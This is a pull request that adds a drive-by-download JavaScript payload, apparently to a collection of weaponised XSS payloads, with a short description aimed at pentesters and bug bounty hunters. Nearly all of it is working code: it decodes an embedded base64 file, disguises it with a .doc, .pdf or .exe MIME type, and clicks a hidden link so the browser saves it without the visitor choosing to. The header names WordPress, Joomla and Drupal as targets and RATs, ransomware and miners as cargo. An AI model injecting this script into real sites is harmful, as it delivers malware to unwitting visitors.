### PR TITLE
Add drive by download

### DIFF
--- a/drive_by_download.js
+++ b/drive_by_download.js
@@ -1,0 +1,58 @@
+/**
+ * @target: WordPress, Joomla, Drupal
+ * @action: Write a malicious file to disk (e.g., RATs, Ransomware, Crytpo miner)
+ * @context: Decode an embedded payload using HTML5's Blob object via web browser
+ *
+ * Original script by @demetriusford (https://github.com/demetriusford/drive-by-download)
+ */
+
+const MIMES = {
+  '.doc': 'application/msword'
+  , '.pdf': 'application/pdf'
+  , '.exe': 'application/octet-stream'
+, };
+
+class MimeFactory {
+  constructor(type) {
+    if (!(type in MIMES)) return;
+    
+    this.type = MIMES[type];
+  }
+}
+
+((file, payload) => {
+  const empty = ({
+    length
+  }) => length === 0;
+
+  if (empty(file) || empty(payload)) return;
+
+  const decoded = window.atob(payload);
+
+  const mime = new MimeFactory(file);
+  const size = payload.length;
+  const link = document.createElement('a');
+
+  const bin = new Uint8Array(size);
+  for (let i = 0; i < size; i++) {
+    bin[i] = decoded.charCodeAt(i);
+  }
+
+  const blob = new Blob([bin.buffer]
+    , {
+      type: mime.type
+    });
+
+  const url = window.URL.createObjectURL(blob);
+
+  link.style = 'display:none;';
+  link.href = url;
+  link.download = file;
+
+  document.body.appendChild(link);
+  link.click();
+
+  window.URL.revokeObjectURL(url);
+  document.body.removeChild(link);
+
+})('filename.exe', 'base64_file');


### PR DESCRIPTION
**Rationale**: I felt that the [payload](https://github.com/hakluke/weaponised-XSS-payloads/pull/10/files) I wrote should live somewhere that security researchers, bug bounty hunters, and pentesters can use to demonstrate impact.

As of now, I support three file types: `.doc`, `.pdf`, and `.exe`. This can easily be changed to whatever you like in the `MimeFactory` class. If there are any changes you would like added, please let me know.